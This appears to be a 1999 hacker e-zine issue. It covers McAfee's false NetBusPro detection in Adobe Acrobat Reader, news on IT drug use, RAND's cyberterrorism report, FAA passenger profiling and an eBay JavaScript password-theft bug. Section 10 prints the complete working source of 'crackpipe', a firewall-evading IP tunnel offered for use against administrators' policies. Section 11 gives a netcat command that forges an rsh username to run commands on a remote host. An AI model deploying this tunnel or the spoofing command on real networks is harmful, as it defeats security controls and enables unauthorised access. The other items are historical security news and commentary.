>Cheers,
>Russ - NTBugtraq moderator
>List address: NTBugtraq@listserv.ntbugtraq.com
>Web site: http://ntbugtraq.ntadvice.com
>

-------------------------------------------------------------------------------

Adobe Conclusion - Part 1
Written by Russ Cooper - 4/13/99 5:38:47 PM

I spoke with a wonderful PR fella at Adobe named Tim Oey this afternoon. I've been travelling since Sunday morning so this is why you haven't seen much from me lately. Anyway, so Tim's all anxious for me to get a change up on my web site regarding the latest breaking news from them (meaning I should change my site to reflect information Sarah sent me in private on Sunday which I published yesterday). I got a chuckle out of the fact he figured I should've changed my site overnight when it's taken them more than 2 weeks to get something up on theirs...but that's another story.
To the heart of the matter; In my editorial, http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28 (which I will be referring to as "my Adobe editorial" from now on), I said;

"It's also worth pointing out that Adobe does not state, even in their public announcement on the issue posted to Bugtraq, that the program in question does not have NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal statement that NetBusPro is not present would seem to have been the right thing to do."

to wit, Tim sent me this URL today;

http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm

within which, they state, unequivocally (as I hoped they would);

"Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro software."

Note, this means not in pre-release, not in released, not in any Adobe software (that goes for Pagemill too!). This means, to me, this has truly been a mis-detection by NAI and Adobe should be believed and trusted on this point.

Now before I get a flood of messages from you X-Files fans out there, listen up.

1. Adobe has never threatened me. Their PR spiel could use some work, and they should learn better how to deal with privacy issues and technical consumers, but I don't, and haven't, felt compelled to say or do anything.

2. I have believed, all along, that this was a mis-detection. When Jim sent me the email from service@adobe.com, I was very suspicious. When I downloaded a then current version of the pre-release and couldn't find a file called NETBUSPRO.DR in there anywhere, I scratched my head and wrote some things. All along, however, I believed it would be borne out to be a mis-detection.

3. You guys, or those that responded to me directly (hundreds of you, thanks!), weren't so convinced. So my Adobe editorial reflected that skepticism and doubt, mixed with the facts I had at hand.

4. For the die-hard conspiracy theorists amongst you, I have a copy of Jim's user's original download of the pre-release. It's 4.6MB zipped, and I won't send it more than a couple of times, but if you can convince me it's going to prove something for you to look at it, I'll pass it along.

There's a few lessons to be learnt here;

I. Anti-virus software will always mis-detect when they are based on signature "profiling".

II. AV Vendors should all have publicly accessible pages stating any and all mis-detections and should be updated immediately once a mis-detection is confirmed. I don't think it matters what liability issues might be obstacles to such a page, the damage mis-detections can cause to individuals, corporations, software distribution venues, as well as publishers, should be allayed by the AV Vendor who mis-detects. I have had numerous reports from a variety of sources about the horror stories mis-detection has caused (and is still causing). I don't think we need view mis-detections as a flaw in the AV software, since they're a fact of the way AV software works. Like Email hoaxes, such spurious incidents occur, and re-occur, and so should be stated somewhere for all to see. One individual told me of how a mis-detection of a macro virus in a Word document led two partner companies to nearly dissolve their relationship because of the insistence of both sides that they had the facts of the matter (virus or not virus).

III. If PR people are going to handle "rumors" such as this one with Adobe, they better know what they're talking about and whom they're talking to. Sarah, from Adobe, meant to send a message to NTBugtraq but sent it to Bugtraq instead because "she got the names mixed up". Gee, I guess she hadn't read any of the thread then, had she (or anyone in the PR side of Adobe). Next she sent me a private unequivocal response to my explicit request for a message to NTBugtraq...duh...

IV. It should be the responsibility of the AV Vendor to make all public statements about mis-detections, including coordinating with the "harmed" vendor and making statements on their behalf. Where's NAI's public statement after all this time??? They must believe announcing they mis-detected something will harm their share value...meanwhile Adobe is left hanging in the wind having to tell the world what NAI has said...without any public confirmation from NAI themselves!! Now Tim told me that our friend Vinnie, Vincent Gullotto, Manager of AV Researchers at AVERT, was "going to have a page put up soon". Well Tim, he told me that too, last week...and we're still waiting.

Finally, many of you are probably wondering why I've spent any time on this, or what it has to do with NT Security in the first place...good question...;-]

Fact is, the original issue occurred with 2 pieces of NT software, so it's somewhat related to NT. More importantly, it was a test of the response mechanisms for the companies involved. Think of it like those tests of the Early Warning System we used to get on TV. As I told Tim;

a. Had the Adobe service rep., the one who responded to Jim's user's question about the detection, not said that a file called NETBUSPRO.DR was in the Acrobat Reader package, none of this would ever have seen the light of day.

b. Had Adobe put up a publicly accessible page on 3/19, when they first knew, and had had confirmed by NAI, that McAfee VirusScan was mis-detecting, none of this would ever have seen the light of day.

c. Had NAI responded to NTBugtraq when I asked them to, and they said they would, the issue would have been dead at that time.

d. Had Adobe's PR not put out the message they did, wherein they couldn't distinguish between a virus and a trojan, or between a malicious piece of code and a commercial software package, and instead had said what they said later, the issue would have been dead.

They didn't, so the issue wouldn't die amongst you, and I kept getting messages making me say more and dig more. All in all, Adobe's none too happy with my speculation and fact mix, NAI's probably not going to talk to me in the future (or for a while anyway), and I've annoyed more than one of you with too many messages about this issue.

...sigh...the life of a moderator...;-]

Cheers,
Russ - NTBugtraq moderator

-------------------------------------------------------------------------------

http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm

McAfee VirusScan 4.x Incorrectly Reports Virus in Ar40.exe or Ar40eng.exe
Document number 323180

Issue

McAfee VirusScan 4.x for Windows reports one or more of the following errors:

- "McAfee VShield: Virus found in download file!"
- "Downloaded File: AR40.ZIP -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download or transmit an infected file. Please delete this file and alert the Webmaster of the virus."
- "Infected File: AR40.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned. Please delete the file and restore it from your backup diskettes."
- "AR40.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected"
- "Downloaded File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download or transmit an infected file. Please delete this file and alert the Webmaster of the virus."
- "Infected File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned. Please delete the file and restore it from your backup diskettes."
- "AR40ENG.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected"

Details

- You are downloading or have downloaded Adobe Acrobat Reader 4.0 Pre-Release for Windows (Ar40.exe) or Adobe Acrobat Reader 4.0 for Windows (Ar40eng.exe).
- You're using McAfee virus definitions 4.0.4017 dated March 15, 1999.
Solution

Download and install virus definitions 4.0.4019 or later from the McAfee Web site at http://www.mcafee.com/. The virus definitions 4.0.4019 are dated March 29, 1999.

Additional Information

Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro software.

McAfee VirusScan 4.x falsely reports the NetBusPro.dr virus when scanning Ar40.exe and Ar40eng.exe when using virus definitions 4.0.4017. The virus alert is caused by an error in version 4.0.4017 of the virus definitions file distributed by Network Associates -- it is not caused by a virus. This has been confirmed by Adobe Systems, Inc. as well as by the virus lab at Network Associates. When you install virus definitions 4.0.4019, VirusScan 4.x does not report an error with Ar40.exe or Ar40eng.exe.

All pre-release and release versions of Acrobat 4.0 Reader are free of known viruses. Adobe uses a variety of anti-virus software in addition to McAfee VirusScan to thoroughly screen all software before it is publicly released. Ar40.exe was released in February 1999. Before uploading it, Adobe used VirusScan 4.x with virus definitions 4.0.4014 dated February 18, 1999 to verify Ar40.exe was clear of viruses. Before uploading Ar40eng.exe, released in April 1999, Adobe used VirusScan 4.x with virus definitions 4.0.4019 to verify Ar40eng.exe was clear of viruses.

For further inquiries regarding this issue, please contact Sarah Rosenbaum, Group Product Manager for Adobe Acrobat, at srosenba@adobe.com.

Related Records:
Product: Acrobat Reader
Platform: Windows
Last Updated: 04/08/99
Filename: 19bc6.htm

-------------------------------------------------------------------------------

Date: Wed, 14 Apr 1999 14:33:59 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Adobe: Conclusion Part 2 - final

FYI:

NAI now has a public web statement posted at:

http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp

This closes the issue.

Cheers,
Russ - NTBugtraq moderator

[http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp]

Network Associates certifies that Adobe software, such as Acrobat Reader, does not contain, and never did contain, the NetBusPro Trojan.
Posted April 13, 1999

McAfee VirusScan 4.x falsely reported the NetBusPro.dr trojan when scanning Ar40.exe and Ar40eng.exe pre-release software when using virus definitions 4.0.4017. The virus alert was caused because there was identifying code within Adobe's product that had a similar pattern as the trojan known as NetBusPro.dr. This has been confirmed by the virus lab at Network Associates, Inc. and by Adobe Systems Incorporated.

If you are experiencing this problem please upgrade your DAT virus definitions to at least v4.0.4019 (http://www.avertlabs.com/public/datafiles/4xupdates.asp), and all issues will be rectified.

Sincerely,
AVERT, A Division Of NAI Labs

@HWA

10.0 Crackpipe.c bypasses any firewalls via tunneling (linux)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* crackpipe.c -- uses the ethertap stuff to try to tunnel an IP, without
   using ipip, to break through firewalls.  May the world's fascist admins
   rot in hell for their port-blocking policies. */

/* usage information is in comments at the very end of this file */

#include <stdio.h>
#include <stdlib.h>      /* atoi(), exit() */
#include <string.h>      /* memcpy(), memset() */
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>

/* define TCP or UDP here so we can decide how we'd like to connect. */
#define UDP
#undef TCP

/* maximum size to use for the copy buffer */
/* setting the MTU of the tap device to something bigger than this would
   probably be a bad idea, methinks */
#define BUFSIZE 4096

/* also, the mtu for the tap device must be smaller than the mtu of your
   connection to the net... if it's not, packets will be chopped up in
   transit.. looking at this, I'd say you've gotta have 16 bytes difference,
   at least, but what's the point in pushing your luck. go for a couple
   hundred or so, so if your ethernet uses an MTU of 1500, do something like
   1200 for safety when you ifconfig tap0 */

void selectloop(int netfd, int tapfd);
void usage(void);

char buffer[BUFSIZE];

int main(int ac, char *av[])
{
    int destport;
    struct sockaddr_in destaddr;
    struct hostent *ht;
    int sock;
    int daemon;
    int netfd;
    int tapfd;

    /* check for a sane number of parameters */
    if(ac != 3)
        usage();

    /* get port number, bail if atoi gives us 0 */
    if((destport = atoi(av[2])) == 0)
        usage();

    /* check if we're a daemon or if we will connect. */
    if(av[1][0] == '-')
        daemon = 1;
    else
        daemon = 0;

    if(!daemon) {
        /* resolve DNS (the hostname is av[1]; the original printed av[2]) */
        if((ht = gethostbyname(av[1])) == NULL) {
            switch(h_errno) {
            case HOST_NOT_FOUND:
                printf("%s: Unknown host\n", av[1]);
                break;
            case NO_ADDRESS:
                printf("%s: No IP address for hostname\n", av[1]);
                break;
            case NO_RECOVERY:
                printf("%s: DNS Error\n", av[1]);
                break;
            case TRY_AGAIN:
                printf("%s: Try again (DNS Fuckup)\n", av[1]);
                break;
            default:
                printf("%s: Unknown DNS error\n", av[1]);
            }
            exit(0);
        }

        /* set up the destaddr struct */
        memset(&destaddr, 0, sizeof(destaddr));
        destaddr.sin_port = htons(destport);
        destaddr.sin_family = AF_INET;
        memcpy(&destaddr.sin_addr, ht->h_addr, ht->h_length);
    }

#ifdef TCP
    sock = socket(AF_INET, SOCK_STREAM, 0);
#endif
#ifdef UDP
    sock = socket(AF_INET, SOCK_DGRAM, 0);
#endif

    if(sock == -1) {
        perror("socket");
        exit(0);
    }

    printf("Opening network socket.\n");

    if(!daemon) {
        if(connect(sock, (struct sockaddr *)&destaddr,
                   sizeof(struct sockaddr_in)) == -1) {
            perror("connect");
            exit(0);
        }
        netfd = sock;
    } else {
        struct sockaddr_in listenaddr;
#ifdef UDP
        struct sockaddr_in remote;
#endif
        socklen_t socklen;

        memset(&listenaddr, 0, sizeof(listenaddr));
        listenaddr.sin_port = htons(destport);
        listenaddr.sin_family = AF_INET;
        listenaddr.sin_addr.s_addr = inet_addr("0.0.0.0");

        if(bind(sock, (struct sockaddr *)&listenaddr,
                sizeof(struct sockaddr_in)) == -1) {
            perror("bind");
            exit(0);
        }

        socklen = sizeof(struct sockaddr_in);
#ifdef TCP
        if(listen(sock, 1) == -1) {
            perror("listen");
            exit(0);
        }
        printf("Waiting for TCP connection...\n");
        if((netfd = accept(sock, (struct sockaddr *)&listenaddr,
                           &socklen)) == -1) {
            perror("accept");
            exit(0);
        }
#else /* TCP */
        netfd = sock;
        /* peek at the first datagram to learn the peer's address, then
           connect() the UDP socket to it so plain read()/write() work */
        recvfrom(netfd, buffer, BUFSIZE, MSG_PEEK,
                 (struct sockaddr *)&remote, &socklen);
        connect(netfd, (struct sockaddr *)&remote, socklen);
#endif
    }

    /* right. now, we've got netfd set to something which we're going to be
       able to use to chat with the network. */

    printf("Opening /dev/tap0\n");

    tapfd = open("/dev/tap0", O_RDWR);
    if(tapfd == -1) {
        perror("tapfd");
        exit(0);
    }

    selectloop(netfd, tapfd);

    return 0;
}

void selectloop(int netfd, int tapfd)
{
    fd_set rfds;
    int maxfd;
    int len;

    if(netfd > tapfd)
        maxfd = netfd;
    else
        maxfd = tapfd;

    while(1) {
        FD_ZERO(&rfds);
        FD_SET(netfd, &rfds);
        FD_SET(tapfd, &rfds);

        if(select(maxfd+1, &rfds, NULL, NULL, NULL) == -1) {
            perror("select");
            exit(0);
        }

        /* network -> tap device */
        if(FD_ISSET(netfd, &rfds)) {
            FD_CLR(netfd, &rfds);
            if((len = read(netfd, buffer, BUFSIZE)) < 1) {
                if(len == -1)
                    perror("read_netfd");
                printf("netfd died, quitting\n");
                close(tapfd);
                exit(0);
            }
            printf("%d bytes from network\n", len);
            write(tapfd, buffer, len);
            continue;
        }

        /* tap device -> network */
        if(FD_ISSET(tapfd, &rfds)) {
            FD_CLR(tapfd, &rfds);
            if((len = read(tapfd, buffer, BUFSIZE)) < 1) {
                if(len == -1)
                    perror("read_tapfd");
                printf("tapfd died, quitting\n");
                shutdown(netfd, 2);
                close(netfd);
                exit(0);
            }
            printf("%d bytes from interface\n", len);
            write(netfd, buffer, len);
            continue;
        }
    } /* end of looping */
}

void usage(void)
{
    printf("You fucked up the arguments.\n");
    exit(0);
}

/* songs of firewalls, by the crackpipe author, just for some interesting
   source reading. */

/* firewall song #1, to the tune of "the beverly hillbillies" */

/* ohhhh, lemme tell you a story about a man who's lame
   this nasty admin oughta hang his head in shame,
   thought one day "this network's kinda loose"
   into his mind poured a bubblin' ooze... */

/* "firewalls," he thought... no mail, no dns... */

/* well, the users decided, this shit has gotta go
   we just need the proper sexy hunk of code,
   well, crackpipe came and broke a hole on through,
   and gave the bastards a needed "fuck you"... */

/* hmmmm. need to finish that eventually */

/* alright, this should tell you how to use this fucker... well,
   hopefully... */

/* alright, the args go something like this:

   crackpipe <host | -> <port>

   the first argument is either the hostname to connect to, or, if you're
   the host which will be listening, a -.. obviously, the system inside the
   firewall gives the hostname, and the free system gives the -.

   both sides must specify a port #... this should, clearly, be the same for
   both ends... that should explain it.. */

/* oh, also, here's what you'll need to turn on in the linux kernel --

   first, you'll need a kernel in the later 2.1 range... I'd say from 2.1.80
   up should be cool, but I'm not positive about that.. if all of the config
   options I mention below aren't present, it's too old.

   in the "Networking Options" section, turn on:
     "Kernel/User netlink socket"
   and, just below,
     "Netlink device emulation"

   also, in the "Network device support" section, turn on:
     "Ethertap network tap"

   if those are compiled in, your kernel is set. */

/* configuring the ethertap device --

   first, the necessary /dev files need to exist, so run:

     mknod /dev/tap0 c 36 16

   to get that to exist.

   next, you have to ifconfig the ethertap device, so pick a subnet you're
   going to use for that. in this example, we're going to use the network
   192.168.1.0, with one side as 192.168.1.1, and the other as
   192.168.1.2... so, you'll need to do:

     ifconfig tap0 192.168.1.1(or .2) mtu 1200

   (see the notes at the beginning for a good size for the mtu value.
   basically, it's got to be lower than the mtu value listed for eth0 when
   you run ifconfig)

   2.1 kernels should create the needed route automatically, so that
   shouldn't be a problem. */

/* hopefully, no matter how 14m3 you are, that will give you some idea of
   what you need to do, config-wise. if not, well, then ask some '1337
   linux-guru type d00d, and hopefully he can get the routing and shit
   right. */

11.0 Unix rshd and rsh/rcp vulnerabilities in WindowsNT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 8 Apr 1999 19:11:54 -0700
From: Eric Gisin <ericg@TECHIE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: rsh/rcp is not secure

This is really a UNIX rshd bug, but it affects users of the NT clients.

It's old news that the BSD rsh/rcp services are not secure, however rshd is still enabled in many UNIX systems. There are rsh/rcp clients in Windows NT, and people are not aware of the ease of defeating security in this environment.

The security of this service is based on privileged ports, which are not widely implemented. The NT versions of rcp/rsh have no special privileges like the UNIX versions. Anyone can modify the source or use netcat to fake the client username. For example,

D:> nc -v unixhost 514 -p 666
^@newbie^@newbie^@chmod a= .^@

This will execute the chmod command under newbie's account, if he permits access from that client machine in .rhosts.

Basically the problem is since Windows NT includes rsh/rcp, people assume it's as secure as the UNIX counterpart, which is not the case.

--------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 09:28:04 -0700
From: David LeBlanc <dleblanc@MINDSPRING.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: rsh/rcp is not secure

At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:
>Basically the problem is since Windows NT includes rsh/rcp, people assume
>it's as secure as the UNIX counterpart, which is not the case.

The UNIX counterpart isn't really all that secure in any case - it assumes that no one on the network can be root, and so come from a low port. Something else to think about is that running a rshd on NT isn't usually a good idea - several implementations run everything as LocalSystem, and the ones that don't store live user passwords.
These utilities are full of other security holes - look at the checks in the various scanning products for some examples. Safest thing is just not to run rsh, rlogin and rexec. David LeBlanc dleblanc@mindspring.com @HWA 12.0 IT professionals are on Drugs? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Independent (UK) http://www.independent.co.uk/net/990419ne/story1.html The high techies They are young, well-paid and, increasingly, turning to recreational drugs to cope with the pressures of their jobs as IT programmers, engineers and developers. By Samantha Downes The violent death of Chris Dawes, multi-millionaire founder of software company Micromuse, grabbed the headlines last month. Dawes was killed when his �640,000 F1 McLaren crashed in rural Essex. At the time, he was facing charges for possession of and intent to supply crack cocaine. While Dawes' death may be an extreme example of the perils of being a hi-tech high flyer, there is a proliferation of recreational drug use in the IT industry. Young IT professionals have eschewed the 1980s black suit for combat fatigues and trainers. The dance and drugs culture has been enthusiastically embraced by these affluent twentysomethings who do not have time for long lunches or hanging out in wine bars. The IT programmers and engineers The Independent met in London clubs saw their drug taking as an outlet which eases long hours and mops up some of their considerable salaries. Robert, a 23-year-old London-based web designer, believes he is a typical example of the recreational drug user. He started taking speed while at university and has graduated to ecstasy and cocaine since starting his job two years ago. "That coke-snorting thing behind the wheel of a Ferrari is such a bloody clich�," he said. "It's not about being glamourous now, it's about relaxing and being sociable." Jules, also 23, is a "boring nerd, but I do love my job". 
He works as a systems engineer at an investment bank and, like Robert, takes ecstasy, but only at weekends. "We all work incredibly hard. Most of the time there are not enough hours for an after-work beer," he said. "And although the work can be monotonous it is very well paid. So getting blasted is simply a fast route to relaxation."

Extra pressures such as the millennium bug have pushed IT professionals into fitting the archetypal recreational drug abuser profile, according to Dr David Best, research co-ordinator at the National Addiction Centre and an honorary lecturer at the Institute of Psychiatry. Dr Best believes that recreational drug abusers are attracted by the image of drug taking as much as the effect of the drugs themselves.

"Stimulant drugs like cocaine are appealing to young wealthy executives because they are associated with gregarious, sociable behaviour," he said. "They are more likely to be used by young up and coming professionals recreationally. These people have a high disposable income and their jobs are pressurised and demanding."

The IT industry's relative youth and its location in cities or large towns also make it prey to opportunistic pushers. Most weekend users admit that they do not have to go out hunting for drugs. "My boss supplies me with the drugs," one female programmer said.

There are geographical variations in drug availability. It is more likely in cities, but it will also depend on the network of the individuals involved and their external contacts, Dr Best said: "Those who sell drugs are opportunistic and if they see a market they will sell to it."

Dr Best said small firms in newer industries are less likely to have the screening processes in place to discourage drug taking. American financial firms in the City have for several years implemented strict and expensive screening, but there appear to be few measures to prevent or dissuade some young IT employees from taking drugs.
Louise, a 20-year-old software developer from Hertfordshire, travels down to London each weekend to join her young, heavily salaried bosses for a binge.

"I work in a young industry where things are changing all the time. I am highly stressed a lot of the time. Most days I'm working 12 to 14 hours. I can't afford to live in London because I work out in the sticks. But because of my hours during the week I can spend what I earn going out every weekend. It's easy to get drugs, whether E, speed or coke."

Personality-based theories of drug use might find sustenance in the stereotypical image of the nerdy computer boffin. "We found that drug users tend to be those with low autonomic arousal, people who have low levels of system activity," Dr Best said. "They need external stimuli and are those most likely to pursue drugs."

"My job is not creative, but that doesn't mean that I'm not creative," explained Louise. "When I'm on E it feels like my mind has opened up - I don't care about anything."

According to the Standing Conference on Drug Abuse, there have been more than 70 notified deaths of ecstasy users in the UK since 1992, but most of the users we spoke to felt the risks were infinitesimal. Those who took cocaine or speed were even less concerned, because these drugs are seen as more established and their effects as better documented.

But employers who turn a blind eye should note the side-effects identified by Dr Valerie Curran, reader in psychopharmacology at University College London. Her research has shown that a significant number of users are liable to bouts of depression. This manifests itself in what the Institute for Drug Dependence calls "presenteeism" - where people were at work but unable to perform their job to the best of their ability.

"We found regular users who were clinically depressed at some stage during the week," Dr Curran said.
"Ecstasy makes your brain spill out huge levels of serotonin, the feel-good hormone, and the brain has to work really hard to get it back." Dr Curran found that the average use of ecstasy and cocaine was every other week. But regular users need more to keep them at the same level of high. "If you give four doses of ecstasy to a monkey it still has brain damage two years later," she said. But Anne Marshall, director of Adfam, believes that weekend drug users are well aware of the risks of their illicit habit. "When it comes to the health issues, people poo-poo all the information pushed at them. Those who use drugs at the weekend have the attitude: 'I work hard, I like to relax but don't have the time, so I need to take something to switch off immediately.' "The problem might not be at a level that is important, but the effects can be long term: relationships with partners or friends may break down, which can be just as damaging." But Marshall believes that in most cases users stop because they simply get too old. "As with alcohol, where the effects of a hangover get worse even as you enter your mid-20s, so too do the effects of drug abuse. That's when people start to re-think their habit. It gets harder to sustain and they have to look for something more rewarding." Peter Skyte, national officer for the 12,000-strong IT Professionals Association, part of the Manufacturing Science and Finance Union, said employers had a duty to prevent drug abuse: bosses should look for "the problem not the symptom". "Drug problems may be work related," Mr Sykes said. "Many employers may worsen problems by imposing certain conditions. They have an obligation to identify risks in the workplace, such as the stress which can be caused by long hours. "We would urge all employers, no matter how small, to make a commitment at senior levels to provide counselling and support for all employees," he added. 
@HWA

13.0 Rand corporation releases a paper on Cyber Terrorism
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Wired: http://www.wired.com/news/news/politics/story/19208.html

How to Fight a Cyberwar
Wired News Report
3:00 a.m. 20.Apr.99.PDT

Future terrorists will take to the Internet to pursue campaigns of disruption instead of destruction, a new report predicts.

Terrorists are already tech-savvy, the Rand Corporation paper claims. Osama bin Laden's remote Afghan retreat is well wired: "The terrorist financier has computers, communications equipment, and a large number of disks for data storage."

Hamas has also taken to the Internet to exchange operational information. For example, operatives communicate via chat rooms and email.

The report distinguishes between "cyberwar" -- a military operation -- and "Netwar," which, the authors believe, will consist of nonmilitary attacks perpetrated by individuals rather than countries. "Whereas cyberwar usually pits formal military forces against each other, Netwar is more likely to involve nonstate, paramilitary, and irregular forces."

The report, prepared for the US Air Force, recommends that the Pentagon stop modernizing all computer systems and communications links. "Full interconnectivity may in fact allow cyberterrorists to enter where they could not [before]," it says.

The report warns that terrorism "will focus on urban areas with strong political and operational constraints." Translation: It's difficult for the Air Force to bomb the bejesus out of a terrorist nest if it's in downtown New York.

Another recommendation is that the Air Force develop better spying technologies. Instead of trying to break encryption, the military should develop "capabilities for reading emanations" from computer monitors, perhaps through "very small, unmanned aerial vehicles."

Other studies have reached similar conclusions about online terrorists.
"The Internet -- and the window to it, the computer terminal -- have become two of the most important pieces of equipment in the extremists' arsenals, not only allowing them to build membership and improve organization, but to strike alliances with people and groups, even a decade ago, that they might never have known about or been able to easily communicate with," says a report prepared in April 1998 for the Chemical Manufacturers Association. The report's authors are former officials from the US Secret Service and the CIA's counterterrorism center. @HWA 14.0 FAA to implement CAPS ~~~~~~~~~~~~~~~~~~~~~ Via HNN and Wired http://www.wired.com/news/news/politics/story/19218.html FAA to Implement CAPS contributed by Space Rogue A $2.8 Billion system is to be used by the FAA to monitor airline passengers. Traveler information will be run through the FAAs secret algorithm and matched against a terrorist profile. If passengers fit the profile, or are chosen at random, increased security will be given to their luggage. While some airlines (NorthWest) have already voluntarily implemented computer-assisted passenger screening programs (CAPS), the FAA may make it mandatory for all airlines. (Hmmm, maybe I won't go to DefCon after all.) You? A Terrorist? Yes! by Declan McCullagh 3:00 a.m. 20.Apr.99.PDT WASHINGTON -- A US$2.8-billion monitoring system championed by Vice President Gore will use computer profiles to single out airline passengers for investigation and scrutiny. Airlines will use a secret algorithm to compare travelers' personal data to profiles of likely terrorists, according to a new proposed federal regulation.Other travelers will be chosen at random. Critics complain the plan shows that Gore doesn't really support privacy. Last May, the vice president told an audience of graduating students at New York University that privacy "is a basic American value." 
"He's been talking about privacy and the protection of personal information online, but those principles that he talks about don't parallel what he's done. He's tried to force intrusive measures into law," says Lisa Dean, vice president of the Free Congress Foundation. "We'd have even more of this with a President Gore." The vice president chaired a high-level White House commission that in 1997 released recommendations that the Federal Aviation Administration compiled into a 40-page rule published Monday. Unless FAA officials change their minds, all 32 US-based airlines will be required to concoct computer-assisted passenger screening programs, called CAPS. Many of the larger airlines, including Northwest Airlines, have already complied. "It's software that runs on the airline's reservation system. What it does is select passengers whose checked bags will require additional security and it also selects passengers at random," says FAA spokesperson Rebecca Trexler. According to the proposed rule, "Random selection helps to ensure passengers' civil liberties by guaranteeing that no individual or group of individuals is excluded from the selection process." Airlines will already know that you are flagged as a suspicious passenger when you arrive at the ticket counter, according to Susan Rork, managing director of security at the Air Transport Association. "The customer service agent would get a signal whether you would be selected for additional security measures," said Rork, and your checked luggage would be put aside to be examined for bombs. Might you be interrogated by police as well? "We are not at this point taking this beyond the checked baggage," she said. Exactly how CAPS databases profile Americans and what information is used remains secret. The FAA, the Department of Justice, and the airline industry -- which jointly developed terrorism profiles behind closed doors -- all claim that details must remain confidential for the system to work. 
The regulation says simply, "The automated system 'scores' passengers according to a set of weighted criteria to determine which should be subjected to additional security measures."

But testimony at a June 1998 House Transportation subcommittee hearing suggested that terrorist profiles are built using a passenger's last name, whether the ticket was purchased with cash, how long before departure it was bought, the type of traveling companions, whether a rental car is waiting, the destination of the flight and passenger, and whether the ticket is one-way or round-trip.

"Much of the information in that profile is proprietary. Essentially the profile is an automated system, not a manual system. It's created from the passenger reservation records and information that is gleaned in passenger reservation records," said ATA's Rork.

In an October 1997 report, the Department of Justice said that CAPS will analyze passenger information by assigning positive and negative values to personal information.

"To determine whether a passenger should be selected, the airline reservation computer identifies the factors that the passenger has hit upon and totals the positive and negative scores; those passengers who score below the FAA-prescribed cutoff are selectees," the Department of Justice said.

A letter from Attorney General Janet Reno accompanying the 12-page report said that CAPS "will not discriminate on the basis of race, color, national or ethnic origin, religion, or gender."

Civil libertarians aren't so easily reassured. "This is not rocket science. Everyone who knows profiling knows that innocent characteristics can have a disparate impact based on race," said ACLU legislative counsel Greg Nojeim.

"For example, a profile that uses past travel to a terrorist-list country to identify people who will be selected for heightened scrutiny is guaranteed to discriminate against people who trace their ancestry to those countries and visit their grandparents there."
The ACLU has collected a list of complaints about passenger profiling. One respondent, who said he was a Northwest Airlines traveler, griped, "The representative indicated that I was selected by the computer for special treatment. At that point, the security person donned surgical gloves and proceeded to go through each and every item in my briefcase in front of all people.... I was very displeased with the whole experience, and felt that it constituted an unwarranted intrusion on my privacy."

Nojeim, a member of the Gore commission's civil liberties advisory panel, said that the commission rejected his group's concerns. Among the recommendations not followed by the FAA are an end date to the profiling system, an independent watchdog panel, and a commitment to not record names and information about suspicious travelers.

The FAA says that it currently plans to record that data for 72 hours, but is considering keeping them on file for 18 months. The proposed regulation also allows the FAA or law enforcement unlimited access to the records "in the course of investigating accidents or security incidents."

The regulations stem from increasing government nervousness about terrorism. Officials warn that a 1995 conspiracy involved Ramzi Ahmed Yousef and other conspirators who planned to bomb 12 US airliners over the Pacific Ocean. The 1996 crash of TWA flight 800 -- which the FBI and National Transportation Safety Board said was not a terrorist act -- caused Clinton to create the Gore commission.

Not long after, the FAA gave a $3.1-million grant to Northwest Airlines to create CAPS and $7.8 million to assist other airlines in deploying it, according to agency figures. Northwest did not immediately return phone calls.

While most of the large carriers have CAPS systems in place, smaller airlines could be in trouble.
The proposed rule states that the "FAA believes that if the potential cost of compliance materializes as expected, several small operators could go out of business due at least in part to the proposed rule." For each of the 12 smaller airlines, the FAA's estimated cost of compliance -- largely hiring staff to do searches -- would be 0.2 to 7.2 percent of total revenues. The FAA estimates the total cost at $2.3 billion over 10 years.

Critics have said the costs of such a plan outweigh the benefits and terrorists are unlikely to be deterred in any case.

"Profiling is a surrender. It's an effort to make people feel safer about flying even though what's being done is highly invasive of passenger privacy, likely to result in discriminatory searches, and unlikely to effectively stop bombings of airplanes," says the ACLU's Nojeim.

Comments on the proposed rule, which can be emailed to 9-NPRM-CMTS@faa.gov, must be received by 18 June.

@HWA

15.0 The Ebayla Hack
     ~~~~~~~~~~~~~~~

from: http://www.because-we-can.com/ebayla/default.htm
contributed to HWA by BHZ

THE EBAYLA BUG AND HOW TO PROTECT YOURSELF

This page describes a security problem that Blue Adept discovered with eBay's on-line auctions on March 31, 1999 (realaudio interview). The security hole allows eBay users to easily steal the passwords of other eBay users.

The exploit involves posting items for bid that include malicious javascript code as part of the item's description. When an unsuspecting eBay user places a bid on the item, the embedded javascript code sends their username and password to the malicious user by e-mail. From the victim's point of view, nothing unusual seems to have occurred, so they are unlikely to report/complain to eBay.
